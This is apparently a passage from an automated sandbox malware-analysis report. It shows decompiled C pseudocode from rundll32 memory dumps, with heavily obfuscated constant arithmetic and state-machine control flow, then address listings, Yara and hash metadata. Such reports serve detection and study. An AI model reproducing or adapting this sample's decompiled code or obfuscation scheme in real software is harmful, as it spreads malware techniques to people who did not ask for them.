				 *(_t421 + 0x24) =  *(_t421 + 0x24) ^ 0x00001184;
				 *(_t421 + 0x68) = 0xd1f6;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x7d0ee771;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) | 0x146ba192;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x7d6fd061;
				 *(_t421 + 0x2c) = 0x301e;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) * 0x69;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) + 0xffff2f7e;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) + 0x7add;
				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) ^ 0x00135481;
				 *(_t421 + 0x70) = 0x1444;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) << 9;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) * 0x58;
				 *(_t421 + 0x70) =  *(_t421 + 0x70) ^ 0x0deed291;
				 *(_t421 + 0x40) = 0xdbcb;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) << 2;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) + 0x85c1;
				 *(_t421 + 0x40) =  *(_t421 + 0x40) ^ 0x0003ec2c;
				 *(_t421 + 0x20) = 0xfb14;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) >> 0xf;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) + 0xffffe5e4;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) ^ 0x8e096c3b;
				 *(_t421 + 0x20) =  *(_t421 + 0x20) ^ 0x71f69dd9;
				 *(_t421 + 0x78) = 0xa667;
				 *(_t421 + 0x78) =  *(_t421 + 0x78) << 9;
				_t374 = 0x4b;
				 *(_t421 + 0x7c) =  *(_t421 + 0x78) * 0x23;
				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) ^ 0x2d804cb7;
				 *(_t421 + 0x4c) = 0x24eb;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0xffff8a60;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x432e;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) ^ 0xffffdfad;
				 *(_t421 + 0x1c) = 0x8ff7;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0xffff7e20;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0x6b1c;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) | 0xe81a6241;
				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) ^ 0xe81a424f;
				 *(_t421 + 0xa0) = 0x8ec2;
				 *(_t421 + 0xa0) =  *(_t421 + 0xa0) * 0x28;
				 *(_t421 + 0xa0) =  *(_t421 + 0xa0) ^ 0x001611ad;
				 *(_t421 + 0x58) = 0x8fa;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0x94aafe32;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) | 0x50621cea;
				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0xd4eaf643;
				 *(_t421 + 0x68) = 0x3e9e;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) / _t374;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) + 0x4fd4;
				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x000029dc;
				 *(_t421 + 0x94) = 0x99a7;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) >> 4;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) ^ 0x00007b7a;
				 *(_t421 + 0x38) = 0x83e0;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) >> 0xb;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) << 9;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) ^ 0x00004453;
				 *(_t421 + 0x60) = 0xe6f7;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) | 0x7af10f83;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) << 3;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) ^ 0xd78f39d0;
				 *(_t421 + 0x78) = 0x97e9;
				 *(_t421 + 0x78) =  *(_t421 + 0x78) + 0x9235;
				_t375 = 0xe;
				 *(_t421 + 0x74) =  *(_t421 + 0x78) / _t375;
				 *(_t421 + 0x74) =  *(_t421 + 0x74) ^ 0x000018b2;
				 *(_t421 + 0x30) = 0xd59f;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 7;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 7;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 0xa;
				 *(_t421 + 0x30) =  *(_t421 + 0x30) ^ 0x9f00725b;
				 *(_t421 + 0x38) = 0xa6ba;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) << 0x10;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) >> 0xc;
				 *(_t421 + 0x38) =  *(_t421 + 0x38) ^ 0x000a754c;
				 *(_t421 + 0x60) = 0x53a7;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) << 3;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) + 0x2bc6;
				 *(_t421 + 0x60) =  *(_t421 + 0x60) ^ 0x0002e6e9;
				 *(_t421 + 0x50) = 0x9b50;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) >> 5;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) >> 0xe;
				 *(_t421 + 0x50) =  *(_t421 + 0x50) ^ 0x00007f5d;
				 *(_t421 + 0x4c) = 0x566e;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x42f2;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x9896;
				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) ^ 0x00014aa9;
				 *(_t421 + 0x94) = 0x126;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) + 0xffffea10;
				 *(_t421 + 0x94) =  *(_t421 + 0x94) ^ 0xffffa88e;
				 *(_t421 + 0x88) = 0x5486;
				_t376 = 0x51;
				 *(_t421 + 0x8c) =  *(_t421 + 0x88) / _t376;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) ^ 0x00007ea1;
				 *(_t421 + 0x14) = 0x191d;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) + 0x9b5;
				 *(_t421 + 0x14) =  *(_t421 + 0x14) >> 5;
				_t377 = 6;
				_t368 =  *(_t421 + 0xa0);
				 *(_t421 + 0x10) =  *(_t421 + 0x14) / _t377;
				 *(_t421 + 0x10) =  *(_t421 + 0x10) ^ 0x0000160b;
				 *(_t421 + 0x98) = 0x6a77;
				 *(_t421 + 0x98) =  *(_t421 + 0x98) ^ 0x34a50dbd;
				 *(_t421 + 0x98) =  *(_t421 + 0x98) ^ 0x34a50f69;
				 *(_t421 + 0x44) = 0x7616;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) + 0xffff0287;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) + 0xffff9d7b;
				 *(_t421 + 0x44) =  *(_t421 + 0x44) ^ 0xffff183e;
				 *(_t421 + 0x8c) = 0xc1dc;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) + 0x7d7c;
				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) ^ 0x00013d0b;
				 *(_t421 + 0x84) = 0xc54;
				 *(_t421 + 0x84) =  *(_t421 + 0x84) >> 7;
				 *(_t421 + 0x84) =  *(_t421 + 0x84) ^ 0x0000610f;
				 *(_t421 + 0x80) = 0xb84f;
				 *(_t421 + 0x80) =  *(_t421 + 0x80) | 0xe7d082ca;
				 *(_t421 + 0x80) =  *(_t421 + 0x80) ^ 0xe7d0dc6c;
				do {
					while(_t415 != 0x7c0af2) {
						if(_t415 == 0x131e8aac) {
							_push(_t377);
							_t377 = 0;
							_t355 = E0200C0C8(0,  *((intOrPtr*)(_t421 + 0x64)),  *((intOrPtr*)(_t421 + 0x54)),  *((intOrPtr*)(_t421 + 0x4e8)),  *((intOrPtr*)(_t421 + 0x54)),  *(_t421 + 0x78),  *(_t421 + 0x6c),  *(_t421 + 0x60), 0,  *(_t421 + 0x30),  *(_t421 + 0x50));
							_t368 = _t355;
							_t421 = _t421 + 0x28;
							__eflags = _t355 - 0xffffffff;
							if(__eflags != 0) {
								_t415 = 0x17f63d9e;
								continue;
							}
						} else {
							if(_t415 == 0x1531e410) {
								_push( *((intOrPtr*)(_t421 + 0x4c4)));
								_push( *(_t421 + 0x1c));
								_push( *(_t421 + 0x50));
								E0200BAEC(0x104, __eflags,  *(_t421 + 0x7c), E01FF5DFC( *(_t421 + 0x2c),  *(_t421 + 0x84), __eflags), _t421 + 0x2cc,  *(_t421 + 0x80),  *((intOrPtr*)(_t421 + 0xa8)),  *((intOrPtr*)(_t421 + 0x4dc)),  *((intOrPtr*)(_t421 + 0xb0)), _t421 + 0xbc);
								_t377 =  *(_t421 + 0x68);
								E02000D6D(_t377,  *((intOrPtr*)(_t421 + 0x90)),  *((intOrPtr*)(_t421 + 0xa4)), _t357);
								_t421 = _t421 + 0x34;
								_t415 = 0x131e8aac;
								continue;
							} else {
								if(_t415 == 0x17f63d9e) {
									_t298 = _t419 + 4; // 0xffff2ff9
									_t362 = E020069AC( *((intOrPtr*)(_t421 + 0xac)), _t298,  *_t419,  *((intOrPtr*)(_t421 + 0x9c)),  *(_t421 + 0x20), _t368,  *(_t421 + 0xa0), _t377,  *_t298);
									_t421 = _t421 + 0x1c;
									_t377 = 1;
									_t415 = 0x1a33388b;
									__eflags = _t362;
									_t412 =  !=  ? 1 : _t412;
									continue;
								} else {
									if(_t415 == 0x1a33388b) {
										E01FFF1ED( *(_t421 + 0x50),  *(_t421 + 0x98),  *(_t421 + 0x8c),  *(_t421 + 0x84), _t368);
									} else {
										if(_t415 == 0x2700e9a0) {
											E02002631( *((intOrPtr*)(_t421 + 0x34)), _t421 + 0x2bc, __eflags,  *(_t421 + 0x74),  *(_t421 + 0x40));
											_pop(_t377);
											_t415 = 0x1531e410;
											continue;
										} else {
											_t430 = _t415 - 0x287e9283;
											if(_t415 != 0x287e9283) {
												goto L15;
											} else {
												_push(_t377);
												E01FFDFD8( *(_t421 + 0x20), _t421 + 0xb8, _t430,  *(_t421 + 0x84),  *(_t421 + 0x70));
												_t366 = E01FFBDCC(_t421 + 0xc0,  *(_t421 + 0x30),  *((intOrPtr*)(_t421 + 0x34)),  *(_t421 + 0x74));
												_t421 = _t421 + 0x14;
												_t415 = 0x2700e9a0;
												_t377 = 0;
												 *_t366 = 0;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t412;
					}
					_t415 = 0x287e9283;
					L15:
					__eflags = _t415 - 0x2b84612a;
				} while (__eflags != 0);
				goto L18;
			}

















                                                                      0x0200b16b
                                                                      0x0200b176
                                                                      0x0200b185
                                                                      0x0200b187
                                                                      0x0200b18e
                                                                      0x0200b195
                                                                      0x0200b197
                                                                      0x0200b1a1
                                                                      0x0200b1a9
                                                                      0x0200b1b4
                                                                      0x0200b1b9
                                                                      0x0200b1c3
                                                                      0x0200b1c8
                                                                      0x0200b1ce
                                                                      0x0200b1d6
                                                                      0x0200b1de
                                                                      0x0200b1eb
                                                                      0x0200b1ec
                                                                      0x0200b1f0
                                                                      0x0200b1f8
                                                                      0x0200b200
                                                                      0x0200b205
                                                                      0x0200b20d
                                                                      0x0200b215
                                                                      0x0200b21d
                                                                      0x0200b227
                                                                      0x0200b22b
                                                                      0x0200b233
                                                                      0x0200b23b
                                                                      0x0200b248
                                                                      0x0200b24c
                                                                      0x0200b254
                                                                      0x0200b262
                                                                      0x0200b26b
                                                                      0x0200b26f
                                                                      0x0200b277
                                                                      0x0200b284
                                                                      0x0200b288
                                                                      0x0200b28d
                                                                      0x0200b295
                                                                      0x0200b29d
                                                                      0x0200b2a5
                                                                      0x0200b2aa
                                                                      0x0200b2b2
                                                                      0x0200b2ba
                                                                      0x0200b2c2
                                                                      0x0200b2ca
                                                                      0x0200b2d2
                                                                      0x0200b2da
                                                                      0x0200b2e2
                                                                      0x0200b2ef
                                                                      0x0200b2f3
                                                                      0x0200b2fb
                                                                      0x0200b303
                                                                      0x0200b30b
                                                                      0x0200b313
                                                                      0x0200b31d
                                                                      0x0200b321
                                                                      0x0200b329
                                                                      0x0200b333
                                                                      0x0200b338
                                                                      0x0200b340
                                                                      0x0200b348
                                                                      0x0200b350
                                                                      0x0200b355
                                                                      0x0200b35d
                                                                      0x0200b365
                                                                      0x0200b36d
                                                                      0x0200b375
                                                                      0x0200b381
                                                                      0x0200b384
                                                                      0x0200b388
                                                                      0x0200b390
                                                                      0x0200b398
                                                                      0x0200b3a0
                                                                      0x0200b3a8
                                                                      0x0200b3b0
                                                                      0x0200b3b8
                                                                      0x0200b3c0
                                                                      0x0200b3c8
                                                                      0x0200b3d0
                                                                      0x0200b3d8
                                                                      0x0200b3eb
                                                                      0x0200b3f2
                                                                      0x0200b3fd
                                                                      0x0200b405
                                                                      0x0200b40d
                                                                      0x0200b415
                                                                      0x0200b41d
                                                                      0x0200b42d
                                                                      0x0200b431
                                                                      0x0200b439
                                                                      0x0200b441
                                                                      0x0200b44c
                                                                      0x0200b454
                                                                      0x0200b45f
                                                                      0x0200b467
                                                                      0x0200b46c
                                                                      0x0200b471
                                                                      0x0200b479
                                                                      0x0200b481
                                                                      0x0200b489
                                                                      0x0200b48e
                                                                      0x0200b496
                                                                      0x0200b49e
                                                                      0x0200b4aa
                                                                      0x0200b4ad
                                                                      0x0200b4b1
                                                                      0x0200b4b9
                                                                      0x0200b4c1
                                                                      0x0200b4c6
                                                                      0x0200b4cb
                                                                      0x0200b4d0
                                                                      0x0200b4d8
                                                                      0x0200b4e0
                                                                      0x0200b4e5
                                                                      0x0200b4ea
                                                                      0x0200b4f2
                                                                      0x0200b4fa
                                                                      0x0200b4ff
                                                                      0x0200b507
                                                                      0x0200b50f
                                                                      0x0200b517
                                                                      0x0200b51c
                                                                      0x0200b521
                                                                      0x0200b529
                                                                      0x0200b531
                                                                      0x0200b539
                                                                      0x0200b541
                                                                      0x0200b549
                                                                      0x0200b556
                                                                      0x0200b561
                                                                      0x0200b56c
                                                                      0x0200b580
                                                                      0x0200b585
                                                                      0x0200b58e
                                                                      0x0200b599
                                                                      0x0200b5a1
                                                                      0x0200b5a9
                                                                      0x0200b5b2
                                                                      0x0200b5b5
                                                                      0x0200b5bc
                                                                      0x0200b5c0
                                                                      0x0200b5c8
                                                                      0x0200b5d3
                                                                      0x0200b5de
                                                                      0x0200b5e9
                                                                      0x0200b5f1
                                                                      0x0200b5f9
                                                                      0x0200b601
                                                                      0x0200b609
                                                                      0x0200b614
                                                                      0x0200b61f
                                                                      0x0200b62a
                                                                      0x0200b635
                                                                      0x0200b63d
                                                                      0x0200b648
                                                                      0x0200b653
                                                                      0x0200b65e
                                                                      0x0200b669
                                                                      0x0200b669
                                                                      0x0200b67b
                                                                      0x0200b7e8
                                                                      0x0200b7f6
                                                                      0x0200b813
                                                                      0x0200b818
                                                                      0x0200b81a
                                                                      0x0200b81d
                                                                      0x0200b820
                                                                      0x0200b822
                                                                      0x00000000
                                                                      0x0200b822
                                                                      0x0200b681
                                                                      0x0200b687
                                                                      0x0200b760
                                                                      0x0200b767
                                                                      0x0200b76b
                                                                      0x0200b7be
                                                                      0x0200b7d2
                                                                      0x0200b7d6
                                                                      0x0200b7db
                                                                      0x0200b7de
                                                                      0x00000000
                                                                      0x0200b68d
                                                                      0x0200b693
                                                                      0x0200b723
                                                                      0x0200b746
                                                                      0x0200b74d
                                                                      0x0200b750
                                                                      0x0200b751
                                                                      0x0200b756
                                                                      0x0200b758
                                                                      0x00000000
                                                                      0x0200b699
                                                                      0x0200b69f
                                                                      0x0200b859
                                                                      0x0200b6a5
                                                                      0x0200b6ab
                                                                      0x0200b712
                                                                      0x0200b718
                                                                      0x0200b719
                                                                      0x00000000
                                                                      0x0200b6ad
                                                                      0x0200b6ad
                                                                      0x0200b6b3
                                                                      0x00000000
                                                                      0x0200b6b9
                                                                      0x0200b6b9
                                                                      0x0200b6d0
                                                                      0x0200b6e8
                                                                      0x0200b6ed
                                                                      0x0200b6f0
                                                                      0x0200b6f5
                                                                      0x0200b6f7
                                                                      0x00000000
                                                                      0x0200b6f7
                                                                      0x0200b6b3
                                                                      0x0200b6ab
                                                                      0x0200b69f
                                                                      0x0200b693
                                                                      0x0200b687
                                                                      0x0200b861
                                                                      0x0200b86d
                                                                      0x0200b86d
                                                                      0x0200b82c
                                                                      0x0200b831
                                                                      0x0200b831
                                                                      0x0200b831
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )r$A3$Lu$[r$nV$wj$z{$|}$R
                                                                      • API String ID: 0-850793479
                                                                      • Opcode ID: d0681bbcf1d8c2ae31e0750e38afae1e1e02a7d62d883bf6dc7be4e0de3dd199
                                                                      • Instruction ID: ad41b5683b246d2f347ec9c328f3f3fce15c3b1d07f433e9157fc25044e258ad
                                                                      • Opcode Fuzzy Hash: d0681bbcf1d8c2ae31e0750e38afae1e1e02a7d62d883bf6dc7be4e0de3dd199
                                                                      • Instruction Fuzzy Hash: 09F103715087819FE368CF61C489A4BFBE1BBC4318F10891DF5E9962A0D7B98949DF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024A6D9, Relevance: 11.6, Strings: 9, Instructions: 322COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )r$A3$Lu$[r$nV$wj$z{$|}$R
                                                                      • API String ID: 0-850793479
                                                                      • Opcode ID: 6e6897a998e18687a9f3c11353b0d64c9edf89887ff37091b059f781d74057a9
                                                                      • Instruction ID: 7af94299c310d750ed1bd799885e2f2491869191c0decd1db032d01098cca52f
                                                                      • Opcode Fuzzy Hash: 6e6897a998e18687a9f3c11353b0d64c9edf89887ff37091b059f781d74057a9
                                                                      • Instruction Fuzzy Hash: 15F1F1715087819FE368CF21C48AA4BFBE1BBC4318F10891DF5E9962A0D7B58959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02008C2B, Relevance: 11.6, Strings: 9, Instructions: 310COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E02008C2B() {
				char _v520;
				short _v524;
				short _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr* _v544;
				intOrPtr _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				void* _t300;
				intOrPtr _t302;
				short _t306;
				short _t308;
				short _t309;
				intOrPtr _t312;
				void* _t317;
				intOrPtr* _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				intOrPtr _t353;
				intOrPtr* _t354;
				short _t355;
				signed int* _t357;

				_t357 =  &_v680;
				_v536 = 0x205681;
				_v532 = 0x662dd;
				_t317 = 0x1e086586;
				_t355 = 0;
				_v528 = 0;
				_v524 = 0;
				_v652 = 0xf058;
				_t350 = 0x3f;
				_v652 = _v652 / _t350;
				_v652 = _v652 ^ 0xf52b0b85;
				_v652 = _v652 ^ 0x1b04eaa7;
				_v652 = _v652 ^ 0xee2fe2f3;
				_v604 = 0x95c0;
				_v604 = _v604 | 0x84eb5d1b;
				_v604 = _v604 ^ 0x37b71fa3;
				_v604 = _v604 ^ 0xb35cc279;
				_v632 = 0xdad5;
				_v632 = _v632 >> 1;
				_v632 = _v632 | 0x6db5f9e1;
				_v632 = _v632 ^ 0x6db5e788;
				_v616 = 0xf7c4;
				_v616 = _v616 + 0xffffc625;
				_v616 = _v616 + 0x83c2;
				_v616 = _v616 ^ 0x000171e4;
				_v620 = 0xd68a;
				_v620 = _v620 ^ 0xd8043047;
				_v620 = _v620 + 0xb99d;
				_v620 = _v620 ^ 0xd805aeb2;
				_v600 = 0xba3e;
				_v600 = _v600 + 0xffff4aed;
				_v600 = _v600 ^ 0xbcc6d77f;
				_v600 = _v600 ^ 0xbcc6d5de;
				_v676 = 0x731e;
				_v676 = _v676 ^ 0x5ee95724;
				_v676 = _v676 << 1;
				_v676 = _v676 ^ 0x578f8622;
				_v676 = _v676 ^ 0xea5dba2f;
				_v564 = 0xdb79;
				_v564 = _v564 + 0xffff5324;
				_v564 = _v564 ^ 0x000059e2;
				_v656 = 0x318b;
				_v656 = _v656 * 0x75;
				_v656 = _v656 | 0xae3833e5;
				_v656 = _v656 ^ 0x79d8626c;
				_v656 = _v656 ^ 0xd7e6dd07;
				_v612 = 0xd72f;
				_v612 = _v612 | 0xacf7f151;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0xf77f2cdc;
				_v588 = 0x6e25;
				_v588 = _v588 | 0xb635d493;
				_v588 = _v588 ^ 0xb635a7f6;
				_v664 = 0x854b;
				_v664 = _v664 >> 2;
				_v664 = _v664 + 0xffff5540;
				_v664 = _v664 + 0xffff815d;
				_v664 = _v664 ^ 0xfffeba3d;
				_v628 = 0x2397;
				_v628 = _v628 ^ 0xd486bf36;
				_v628 = _v628 * 0x57;
				_v628 = _v628 ^ 0x39bf10ef;
				_v592 = 0x332f;
				_v592 = _v592 << 0xf;
				_v592 = _v592 ^ 0x1997d067;
				_v584 = 0x9daa;
				_v584 = _v584 ^ 0xc1827730;
				_v584 = _v584 ^ 0xc182cb74;
				_v552 = 0xead9;
				_v552 = _v552 << 0x10;
				_v552 = _v552 ^ 0xead93b3b;
				_v568 = 0x955d;
				_v568 = _v568 >> 4;
				_v568 = _v568 ^ 0x00001627;
				_v668 = 0x4c8;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xabe4;
				_v668 = _v668 | 0x24ffa7bc;
				_v668 = _v668 ^ 0x24fff134;
				_v608 = 0xf88a;
				_v608 = _v608 ^ 0x49fbfdea;
				_v608 = _v608 << 5;
				_v608 = _v608 ^ 0x3f60b2d9;
				_v660 = 0xc005;
				_v660 = _v660 << 0xa;
				_v660 = _v660 ^ 0xddadac51;
				_v660 = _v660 | 0xebc284be;
				_v660 = _v660 ^ 0xffefbdbf;
				_v560 = 0xaa76;
				_v560 = _v560 >> 0xa;
				_v560 = _v560 ^ 0x0000145f;
				_v680 = 0x11f3;
				_v680 = _v680 >> 0x10;
				_v680 = _v680 + 0x9fae;
				_v680 = _v680 + 0xffffa8e8;
				_v680 = _v680 ^ 0x000040be;
				_v556 = 0x5f3c;
				_v556 = _v556 << 0xd;
				_v556 = _v556 ^ 0x0be7cdfb;
				_v640 = 0x303f;
				_v640 = _v640 | 0xdf49b5a6;
				_v640 = _v640 + 0xffffa103;
				_v640 = _v640 ^ 0xdf496290;
				_v636 = 0xc44a;
				_v636 = _v636 << 9;
				_t351 = 0x24;
				_v636 = _v636 / _t351;
				_v636 = _v636 ^ 0x000ae4ba;
				_v672 = 0xae3b;
				_v672 = _v672 | 0xebb53fed;
				_v672 = _v672 << 0xa;
				_v672 = _v672 ^ 0xd6fff3bd;
				_v576 = 0x604f;
				_v576 = _v576 + 0x4aad;
				_v576 = _v576 ^ 0x0000811b;
				_v624 = 0x82fc;
				_t352 = 0x4d;
				_t349 = _v544;
				_t316 = _v544;
				_v624 = _v624 * 0xb;
				_v624 = _v624 ^ 0xf6599f92;
				_v624 = _v624 ^ 0xf65c714c;
				_v572 = 0x87e5;
				_v572 = _v572 | 0x0de14e4e;
				_v572 = _v572 ^ 0x0de1e3d5;
				_v580 = 0xaa00;
				_v580 = _v580 >> 0xf;
				_v580 = _v580 ^ 0x00000356;
				_v596 = 0x78ee;
				_v596 = _v596 * 0x44;
				_v596 = _v596 >> 1;
				_v596 = _v596 ^ 0x00108f9c;
				_v648 = 0x727e;
				_t353 = _v548;
				_v648 = _v648 / _t352;
				_v648 = _v648 ^ 0x94612659;
				_v648 = _v648 + 0xffff79fc;
				_v648 = _v648 ^ 0x9460d1f8;
				_v644 = 0x1b66;
				_v644 = _v644 ^ 0x7f7a90b3;
				_v644 = _v644 ^ 0x38b35886;
				_v644 = _v644 ^ 0x47c9d350;
				while(1) {
					_t300 = 0xbce5228;
					L2:
					while(_t317 != 0x31c8274) {
						if(_t317 == 0x6eb678d) {
							E01FFF1ED(_v572, _v580, _v596, _v648, _t316);
						} else {
							if(_t317 == _t300) {
								_t306 = E01FFACE6(_t349, _v552, _t317, _t317, _t316, _t353, _v568, _v652, _v668, _v608, _t317,  &_v540, _v660, _v560);
								_t357 =  &(_t357[0xc]);
								__eflags = _t306;
								if(_t306 != 0) {
									_t354 = _t349;
									while(1) {
										__eflags =  *((intOrPtr*)(_t354 + 4)) - 4;
										if( *((intOrPtr*)(_t354 + 4)) != 4) {
											goto L17;
										}
										L16:
										_t309 = E01FF7F4B(_t354 + 0xc, _v680, _v544, _v556, _v640);
										_t357 =  &(_t357[3]);
										__eflags = _t309;
										if(_t309 == 0) {
											_t355 = 1;
											__eflags = 1;
										} else {
											goto L17;
										}
										L20:
										_t353 = _v548;
										goto L21;
										L17:
										_t308 =  *_t354;
										__eflags = _t308;
										if(_t308 != 0) {
											_t354 = _t354 + _t308;
											__eflags =  *((intOrPtr*)(_t354 + 4)) - 4;
											if( *((intOrPtr*)(_t354 + 4)) != 4) {
												goto L17;
											}
										}
										goto L20;
									}
								}
								L21:
								__eflags = _t355;
								if(__eflags == 0) {
									_t300 = 0xbce5228;
									_t317 = 0xbce5228;
									continue;
								} else {
									E02002551(_v636,  *((intOrPtr*)( *0x2011090 + 0x1c)), _v672);
									_t317 = 0xc17c725;
									while(1) {
										_t300 = 0xbce5228;
										goto L2;
									}
								}
								L31:
							} else {
								if(_t317 == 0xc17c725) {
									E01FFDE81(_v576, _t349, _v624);
									_t317 = 0x6eb678d;
									while(1) {
										_t300 = 0xbce5228;
										goto L2;
									}
								} else {
									if(_t317 == 0x1e086586) {
										_t317 = 0x1e3f627f;
										continue;
									} else {
										if(_t317 == 0x1e3f627f) {
											_push(_t317);
											E01FFDFD8(_v632,  &_v520, __eflags, _v616, _v620);
											_t312 = E01FFBDCC( &_v520, _v600, _v676, _v564);
											_t357 =  &(_t357[5]);
											_v544 = _t312;
											 *((short*)(_t312 - 2)) = 0;
											_t317 = 0x31c8274;
											while(1) {
												_t300 = 0xbce5228;
												goto L2;
											}
										} else {
											if(_t317 != 0x265fc3c2) {
												L27:
												__eflags = _t317 - 0x2fa258b4;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t353 = 0x1000;
												_push(_t317);
												_v548 = 0x1000;
												_t349 = E01FF54FB(0x1000);
												_t300 = 0xbce5228;
												_t317 =  !=  ? 0xbce5228 : 0x6eb678d;
												continue;
											}
										}
									}
								}
							}
						}
						L30:
						__eflags = 0;
						return 0;
						goto L31;
					}
					_push(_t317);
					_t302 = E0200C0C8(_v604 | 0x00000006, 1, _v656,  &_v520, _v612, _v588, 0x2000000, _v664, _t317, _v644, _v628);
					_t316 = _t302;
					_t357 =  &(_t357[0xa]);
					__eflags = _t302 - 0xffffffff;
					if(__eflags == 0) {
						_t317 = 0x2fa258b4;
						_t300 = 0xbce5228;
						goto L27;
					} else {
						_t317 = 0x265fc3c2;
						continue;
					}
					goto L30;
				}
			}



























































                                                                      0x02008c2b
                                                                      0x02008c31
                                                                      0x02008c3e
                                                                      0x02008c49
                                                                      0x02008c51
                                                                      0x02008c53
                                                                      0x02008c5a
                                                                      0x02008c61
                                                                      0x02008c70
                                                                      0x02008c73
                                                                      0x02008c77
                                                                      0x02008c7f
                                                                      0x02008c87
                                                                      0x02008c8f
                                                                      0x02008c97
                                                                      0x02008c9f
                                                                      0x02008ca7
                                                                      0x02008caf
                                                                      0x02008cb7
                                                                      0x02008cbb
                                                                      0x02008cc3
                                                                      0x02008ccb
                                                                      0x02008cd3
                                                                      0x02008cdb
                                                                      0x02008ce3
                                                                      0x02008ceb
                                                                      0x02008cf3
                                                                      0x02008cfb
                                                                      0x02008d03
                                                                      0x02008d0b
                                                                      0x02008d13
                                                                      0x02008d1b
                                                                      0x02008d23
                                                                      0x02008d2b
                                                                      0x02008d33
                                                                      0x02008d3b
                                                                      0x02008d3f
                                                                      0x02008d47
                                                                      0x02008d4f
                                                                      0x02008d5a
                                                                      0x02008d65
                                                                      0x02008d70
                                                                      0x02008d7d
                                                                      0x02008d81
                                                                      0x02008d89
                                                                      0x02008d91
                                                                      0x02008d99
                                                                      0x02008da1
                                                                      0x02008da9
                                                                      0x02008dae
                                                                      0x02008db6
                                                                      0x02008dbe
